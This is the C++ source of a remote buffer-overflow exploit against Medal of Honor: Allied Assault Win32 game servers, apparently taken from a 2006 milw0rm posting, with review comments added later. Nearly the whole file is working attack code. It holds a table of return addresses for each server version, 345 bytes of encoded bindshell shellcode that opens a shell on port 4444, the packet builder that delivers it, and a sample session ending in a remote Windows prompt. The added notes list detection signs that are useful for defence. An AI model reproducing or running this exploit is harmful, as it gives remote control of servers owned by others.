/*
 * MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
 * Written by RunningBon
 *
 * Please use this responsibly, as I am not responsible for any damage you
 * cause by using it.
 *
 * IRC: irc.rizon.net #kik
 * E-mail: runningbon@gmail.com
 *
 * Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
 *
 * Example:
 *
 *   C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
 *   MoHAA Server Buffer overflow exploit
 *   Written by RunningBon
 *   E-Mail: runningbon@gmail.com
 *   IRC: irc.rizon.net #kik
 *
 *   Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
 *   Building packet.
 *   Sending packet.
 *   Packet sent.
 *   Check for your shell on port 4444.
 *
 *   C:\>telnet 192.168.2.44 4444
 *   Microsoft Windows XP [Version 5.1.2600]
 *   (C) Copyright 1985-2001 Microsoft Corp.
 *
 *   C:\Program Files\EA GAMES\MOHAA>
 *
 * Review notes (added for readers studying this listing):
 *   - This is a C++ source (struct and sockaddr names are used without the
 *     `struct` keyword, loop variables are declared in `for`), built with the
 *     Microsoft toolchain (`#pragma comment(lib, ...)`, Win32 API calls).
 *   - Network observable from the defender's side: one UDP datagram to the
 *     server port that starts with the bytes FF FF FF FF 02 "getinfo " and is
 *     followed by a run of several hundred 0x7A ('z') bytes; with the two
 *     table entries below the datagram is 878 bytes long. A legitimate query
 *     of this kind is presumably far shorter — confirm against real traffic.
 *   - Host observable after a successful run, per the transcript above: a new
 *     TCP listener on port 4444 owned by the game-server process.
 */

// NOTE(review): the two header names were lost in extraction (angle-bracketed
// text was stripped). The code below uses the Win32 and Winsock APIs.
#include
#include

/*
 * Per-version parameters that shape the packet built in Exploit().
 *
 *   pName         - version string the operator passes as argv[3]; matched
 *                   case-insensitively (stricmp) in main().
 *   dwNewEIP      - 4-byte value copied raw into the packet right after the
 *                   filler; by its name it is the address the overflow leaves
 *                   in the instruction pointer (not verifiable from here).
 *   dwFillLength  - number of 'z' bytes written between the query header and
 *                   dwNewEIP.
 */
struct VersionStruct {
    char *pName;
    DWORD dwNewEIP;
    DWORD dwFillLength;
};

// Supported server builds. Brace elision: each triple is one VersionStruct.
VersionStruct Versions[] = {
    "MOHAA-v1.11",   0xCBB935, 516,
    "MOHAA:S-v2.15", 0x923575, 516,
    //Add MOHAA:Breakthrough support
};

// MSVC-specific: link the Winsock 2 import library.
#pragma comment (lib, "ws2_32.lib")

//Port 4444 bindshell
// Opaque payload bytes (author's description above). Exploit() copies the whole
// array, including its terminating NUL, into the packet after dwNewEIP
// (sizeof(szShellcode) == 345 bytes). Not decoded or annotated here.
unsigned char szShellcode[] =
    "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
    "\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
    "\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
    "\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
    "\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
    "\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
    "\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
    "\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
    "\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
    "\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
    "\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
    "\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
    "\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
    "\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
    "\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
    "\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
    "\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
    "\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
    "\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
    "\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
    "\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
    "\x11\x13\x38\x7e\x92\xec\xee\x81";

/*
 * Print an error message and terminate the process.
 *
 * pString - text appended to the "[ERROR]" prefix.
 *
 * Never returns. Note the exit code is 0 even on failure, so a calling script
 * cannot tell success from error by status; the `return 0;` statements that
 * follow Error() calls below are therefore unreachable.
 */
void Error(char *pString) {
    printf("[ERROR] %s\n", pString);
    ExitProcess(0);
}

/*
 * Build the malformed getinfo datagram and send it once over UDP.
 *
 * pIP      - dotted-quad target address (passed straight to inet_addr; no
 *            validation, an unparsable string yields INADDR_NONE silently).
 * iPort    - UDP destination port (host order; converted with htons).
 * pVersion - table entry selected in main(); supplies the filler length and
 *            the 4 bytes written after it.
 *
 * Returns 1 once sendto() succeeds. The `return 0;` paths are unreachable
 * because Error() exits the process.
 *
 * Packet layout, in order:
 *   13 bytes  "\xff\xff\xff\xff\x02getinfo "  (sizeof(szHeader) - 1)
 *   dwFillLength bytes of 'z'                (516 for both table entries)
 *   4 bytes   pVersion->dwNewEIP as stored in memory
 *   345 bytes szShellcode incl. its NUL       (sizeof(szShellcode))
 * Total with the table above: 878 bytes. iLen is never compared against
 * sizeof(szBuffer) (4096); the current entries fit with room to spare.
 */
int Exploit(char *pIP, int iPort, VersionStruct *pVersion) {
    WSAData WSADATA;
    SOCKET Socket = NULL;
    sockaddr_in SockAddr;
    char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
    char szBuffer[4096];
    int iLen = 0;

    // Return value of WSAStartup is not checked.
    WSAStartup(MAKEWORD(1, 1), &WSADATA);

    // NOTE(review): Winsock documents INVALID_SOCKET as the failure value of
    // socket(); SOCKET_ERROR is the failure value for calls like sendto().
    // A failed socket() would presumably slip past this test — confirm.
    if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR) {
        Error("socket()");
        return 0;
    }

    SockAddr.sin_addr.s_addr = inet_addr(pIP);
    SockAddr.sin_port = htons(iPort);
    SockAddr.sin_family = AF_INET;

    printf("Building packet.\n");
    memset(szBuffer, 0, sizeof(szBuffer));

    // Query prefix, without the string's terminating NUL.
    memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
    iLen += sizeof(szHeader) - 1;

    // Filler run.
    memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
    iLen += pVersion->dwFillLength;

    // Raw 4-byte copy of the table value, in the host's native byte order.
    memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
    iLen += sizeof(DWORD);

    // Payload; sizeof() includes the array's trailing NUL byte.
    memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
    iLen += sizeof(szShellcode);

    printf("Sending packet.\n");
    if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR) {
        Error("sendto()");
        return 0;
    }
    printf("Packet sent.\n");

    // The socket is never closed and WSACleanup() is never called; the OS
    // reclaims both at process exit.
    return 1;
}

// Banner printed at startup.
void PrintWelcome() {
    printf(
        "MoHAA Server Buffer overflow exploit\n"
        "Written by RunningBon\n"
        "E-Mail: runningbon@gmail.com\n"
        "IRC: irc.rizon.net #kik\n"
        "\n"
    );
}

/*
 * Print command-line usage and the list of supported version names.
 *
 * pPath - argv[0], echoed into the usage line.
 *
 * NOTE(review): the three argument placeholders in the "Usage" format string
 * (angle-bracketed text) were stripped in extraction; main() expects
 * <ip> <port> <version> in that order, per its argv[1..3] accesses.
 */
void PrintUsage(char *pPath) {
    printf("Usage: %s \n\n", pPath);
    printf("Supported Version List:\n");
    // `int` index compared against a size_t expression (signed/unsigned
    // comparison warning); harmless for a two-entry table.
    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++) {
        printf("%s\n", Versions[i].pName);
    }
}

/*
 * Entry point: argv[1] = target IP, argv[2] = UDP port, argv[3] = version
 * name from the Versions table (case-insensitive match).
 *
 * Returns 0 in every path that returns; Error() exits the process on an
 * unknown version.
 */
int main(int argc, char **argv) {
    VersionStruct *pVersion = NULL;

    PrintWelcome();

    if(argc < 4) {
        PrintUsage(argv[0]);
        return 0;
    }

    // Select the table entry by name; first match wins.
    for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++) {
        if(!stricmp(argv[3], Versions[i].pName)) {
            pVersion = &Versions[i];
            break;
        }
    }

    // Error() never returns, which is what keeps the dereferences of
    // pVersion below safe.
    if(pVersion == NULL) {
        Error("Invalid version.");
    }

    // atoi() is called twice on argv[2] and its result is not range-checked;
    // a non-numeric port silently becomes 0.
    printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);

    if(Exploit(argv[1], atoi(argv[2]), pVersion)) {
        printf("Check for your shell on port 4444.\n");
    }

    return 0;
}

// milw0rm.com [2006-05-10]